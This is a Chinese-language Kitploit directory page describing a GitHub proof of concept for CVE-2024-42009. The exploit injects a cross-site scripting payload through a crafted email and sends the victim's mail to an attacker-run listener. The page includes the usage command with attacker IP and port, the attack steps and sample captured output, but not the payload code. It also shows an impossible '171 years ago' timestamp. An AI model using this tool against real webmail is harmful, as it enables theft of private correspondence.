Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-42009 — 该概念验证(PoC)演示了针对 CVE-2024-42009 的漏洞利用,利用跨站脚本(XSS)漏洞从目标 Webmail 应用程序中提取电子邮件。该攻击注入恶意负载,将电子邮件内容外泄至攻击者控制的监听器。 | Kitploit
工具/GitHubGitHub/bhanunamikaze/cve-2024-42009
钓鱼工具侦察Payload生成漏洞利用Web应用程序漏洞利用数据泄露信息收集学习与教育
GitHubbhanunamikaze/cve-2024-42009

CVE-2024-42009

该概念验证(PoC)演示了针对 CVE-2024-42009 的漏洞利用,利用跨站脚本(XSS)漏洞从目标 Webmail 应用程序中提取电子邮件。该攻击注入恶意负载,将电子邮件内容外泄至攻击者控制的监听器。

查看仓库
171年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-42009 PoC:电子邮件捕获监听器与XSS漏洞利用

概述

本概念验证(PoC)演示了针对CVE-2024-42009漏洞的利用方法,利用跨站脚本(XSS)漏洞从目标Webmail应用程序中提取电子邮件。攻击注入恶意载荷,将邮件内容外泄到攻击者控制的监听器。

特性

  • 利用XSS漏洞捕获电子邮件内容。
  • 使用HTTP监听器接收并解码外泄的电子邮件。
  • 自动化载荷注入与外泄过程。

依赖

  • Python 3.x
  • 所需依赖(通过pip安装):
    root@kitploit:~
    pip install requests beautifulsoup4
    

使用方法

使用必要参数运行脚本:

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

参数

参数描述
-fu, --from-user发件人电子邮件地址
-tu, --to-user收件人电子邮件地址
-u, --target-url目标Webmail URL
-ip, --server-ip攻击者监听器IP地址
-p, --server-port监听器端口(默认:1337)

攻击流程

  1. 启动监听器:脚本启动一个HTTP服务器以捕获提取的电子邮件。
  2. 注入恶意载荷:通过精心构造的电子邮件发送XSS载荷。
  3. 触发执行:当受害者打开邮件时,载荷执行并将邮件内容发送至攻击者服务器。
  4. 捕获与解码:提取的邮件内容被解码并显示。

示例输出

root@kitploit:~
[*] CVE-2024-42009 PoC:正在监听 192.168.1.100:1337...
[*] 正在为UID 1发送载荷...
[+] 已为UID 1发送载荷(状态码:200)

[+] 捕获的邮件内容:
你好,这是一封测试邮件!

免责声明

我不对该漏洞及其对应在本GitHub仓库中托管的所有漏洞利用代码主张权利/所有权/披露权——所有功劳归于发现该漏洞的研究人员;我只是基于互联网上的数据创建了一个PoC来复现该漏洞。 本PoC仅用于教育和研究目的。未经同意对系统进行非法测试是违法的!请负责任地使用!

下载工具